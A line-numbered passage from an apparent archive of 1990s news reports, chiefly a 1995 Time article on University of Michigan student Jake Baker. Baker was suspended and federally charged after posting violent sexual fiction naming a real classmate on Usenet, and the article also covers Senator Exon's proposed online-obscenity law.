  18766. The student was suspended Thursday by a special emergency order
  18767. from university President James J. Duderstadt. His identification
  18768. card was seized and he was evicted from his university residence
  18769. without a hearing.
  18770.  
  18771. University spokeswoman Lisa Baker declined to comment.
  18772.  
  18773. -------------------------------------------------------------------------------
  18774.  
  18775. Snuff Porn On The Net                                              Feb 12, 1995
  18776. ~~~~~~~~~~~~~~~~~~~~~
  18777. by Philip Elmer-Dewitt (Time)
  18778.  
  18779. Jake Baker doesn't look like the kind of guy who would tie a woman by her
  18780. hair to a ceiling fan. The slight (5 ft. 6 in., 125 lbs.), quiet, bespectacled
  18781. sophomore at the University of Michigan is described by classmates as gentle,
  18782. conscientious and introverted.
  18783.  
  18784. But Baker has been doing a little creative writing lately, and his words have
  18785. landed him in the middle of the latest Internet set-to, one that pits a
  18786. writer's First Amendment guarantees of free speech against a reader's right
  18787. to privacy. Now Baker is facing expulsion and a possible sentence of five
  18788. years on federal charges of sending threats over state lines.
  18789.  
  18790. It started in early December, when Baker composed three sexual fantasies and
  18791. posted them on alt.sex.stories, a newsgroup on the Usenet computer network
  18792. that is distributed via the Internet. Even by the standards of alt.sex.stories,
  18793. which is infamous for explicit depictions of all sorts of sex acts, Baker's
  18794. material is strong stuff. Women (and young girls) in his stories are
  18795. kidnapped, sodomized, mutilated and left to die by men who exhibit no remorse.
  18796. Baker even seemed to take pleasure in the behavior of his protagonists and
  18797. the suffering of their victims.
  18798.  
  18799. The story that got Baker in trouble featured, in addition to the ceiling fan,
  18800. acts performed with superglue, a steel-wire whisk, a metal clamp, a spreader
  18801. bar, a hot curling iron and, finally, a match. Ordinarily, the story might
  18802. never have drawn attention outside the voyeuristic world of Usenet sex groups,
  18803. but Baker gave his fictional victim the name of a real female student in one
  18804. of his classes.
  18805.  
  18806. Democratic Senator James Exon of Nebraska introduced legislation earlier
  18807. this month calling for two-year prison terms for anyone who sends, or
  18808. knowingly makes available, obscene material over an electronic medium.
  18809. "I want to keep the information superhighway from resembling a red-light
  18810. district," Exon says.
  18811.